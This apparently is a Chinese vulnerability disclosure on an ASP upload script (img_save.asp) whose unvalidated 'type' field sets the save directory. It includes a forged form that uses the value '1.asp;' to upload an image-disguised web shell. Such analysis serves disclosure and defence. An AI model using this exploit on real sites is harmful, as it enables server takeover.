By:piaoye

    因需要下载了源码看了一下

    问题出现在 \inc\img_save.asp 文件中

以下是引用片段:

....省略一千万行....
' Upload handler excerpt from img_save.asp: reads the multipart form, builds the
' target directory from the "type" field, validates size and extension of the
' uploaded file, saves it and (in one branch only) resizes it with Persits.Jpeg.
' NOTE: `fs` is created here but not used anywhere in this excerpt; a second
' FileSystemObject (objFSO) is created further down and used instead.
set fs=server.CreateObject("scripting.filesystemobject")
set upload=new upload_5xSoft '' create the upload object
'-------- convert date into file name --------
formPath="/uploadfile/"
' The "type" form field is caller-controlled and is concatenated into the
' directory path without any validation; it later reaches FolderExists,
' CreateFolder and SaveAs below. Only the file extension is checked further
' down, never this directory component. A fix would validate formPath2
' against an allowlist of expected subdirectory names (or a strict
' letters/digits character set) and reject anything else before use.
formpath2=upload.form("type")  //* BUG出现在这里,type值 从from获得 自定义路径
formPath=formPath&formPath2 //*路径生成。。。。uploadfile+type
' "adsrc" defaults to "ADSrc" and is otherwise taken verbatim from the form; it
' is later written into the response's <script> block (after %>) without any
' encoding, so it should be validated or encoded as well.
if upload.form("adsrc")="" then 
adsrc="ADSrc"
else
adsrc=upload.form("adsrc")
end if
'' append (/) to the directory
if right(formPath,1)<>"/" then formPath=formPath&"/"
set file=upload.file("picture") '' create a file object
if file.FileSize>0 then '' FileSize > 0 means file data was sent
' reject uploads larger than 300000 bytes (reported to the user as 300K)
if file.filesize>300000 then
response.write"<SCRIPT language=JavaScript>alert('上传图片大于规定(300K),请改变文件大小后重新上传!');"
response.write"javascript:history.back(-1)</SCRIPT>"
response.end
end if
' extension = text after the last "."; FixName and CheckFileExt are defined
' elsewhere (not in this excerpt), so what they accept is not shown here
FileExt        = Mid(file.Filename, InStrRev(file.Filename, ".")+1)
FileExt        = FixName(FileExt)
If Not ( CheckFileExt(FileExt) ) Then
response.write"<SCRIPT language=JavaScript>alert('上传图片只支持 gif|jpg|jpeg|bmp|png 图象文件!');"
response.write"javascript:history.back(-1)</SCRIPT>"
response.end
end if

' final file name: MakedownName() (defined elsewhere) plus the checked extension
thename=MakedownName()&"."&FileExt
' check whether the member image directory exists
  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
    If objFSO.FolderExists(Server.MapPath(""&formPath&"")) Then' if it exists, save the image directly
  file.SaveAs Server.mappath(formPath&thename)
  Else
  ' the directory created here is named by the unvalidated "type" value above
  objFSO.CreateFolder(Server.MapPath(""&formPath&""))' otherwise create the directory
  file.SaveAs Server.mappath(formPath&thename)
 
  ' NOTE: the resize below runs only in this Else branch, i.e. only when the
  ' directory did not exist yet; files saved into an existing directory are
  ' stored unmodified. Whether Persits.Jpeg handles the gif/bmp/png types the
  ' extension check allows is not shown here.
  Set Jpeg = Server.CreateObject("Persits.Jpeg") ' instantiate the component
Path = Server.MapPath(formPath&thename) ' path of the image to process
Jpeg.Open Path
' scale the longer side to 350; a square image (ratio exactly 1) matches
' neither branch and is left at its original size; a zero OriginalHeight is
' not guarded and would make the division fail
If Jpeg.OriginalWidth / Jpeg.OriginalHeight > 1 then
Jpeg.Width = 350
Jpeg.Height = int((350/Jpeg.OriginalWidth)*Jpeg.OriginalHeight)
elseif Jpeg.OriginalWidth / Jpeg.OriginalHeight < 1 then
Jpeg.Height = 350
Jpeg.Width= int(Jpeg.OriginalWidth*(350/Jpeg.Height))
end if

' overwrite the saved file with the resized image
Jpeg.Save Server.MapPath(formPath&thename)

  End If
  Set objFSO = Nothing      ' release the FileSystemObject instance
' file name handed back to the page script below
imgs=thename
else
response.write"<SCRIPT language=JavaScript>alert('上传文件为空或文件太大!');"
response.write"javascript:history.back(-1)</SCRIPT>"
response.end
end if

%>
<script>
//alert("上传图片成功")
var random = Math.random();
window.opener.document.Form1.<%=adsrc%>.value="<%=formpath%><%=imgs%>";  //* 返回路径、文件名路径
....省略一千万行....

    接下来伪造表单提交图片马

以下是引用片段:

<!-- Reproduction form quoted in the advisory: the hidden "type" and "adsrc" fields carry caller-chosen
     values that img_save.asp concatenates into the upload directory path and into its response script
     without validation; the server side should validate both against an allowlist. -->
<FORM name=formuppic action=http://www.xxxx.com/inc/img_save.asp method=post encType=multipart/form-data>
   <input type="hidden" name="adsrc" value="1.asp;"><input type="hidden" name="type" value="1.asp;">
   <TBODY>
        <TR>
          <TD>上传文件:
    <input type=file name="picture"> <INPUT style="FONT-SIZE: 9pt" type=submit value="确 定" name=submit>
          </TD>
        </TR>
      </TBODY>  </FORM>

    上传后会得到如下地址:window.opener.document.Form1.1.asp;.value="/uploadfile/1.asp;/2011111990914.jpg";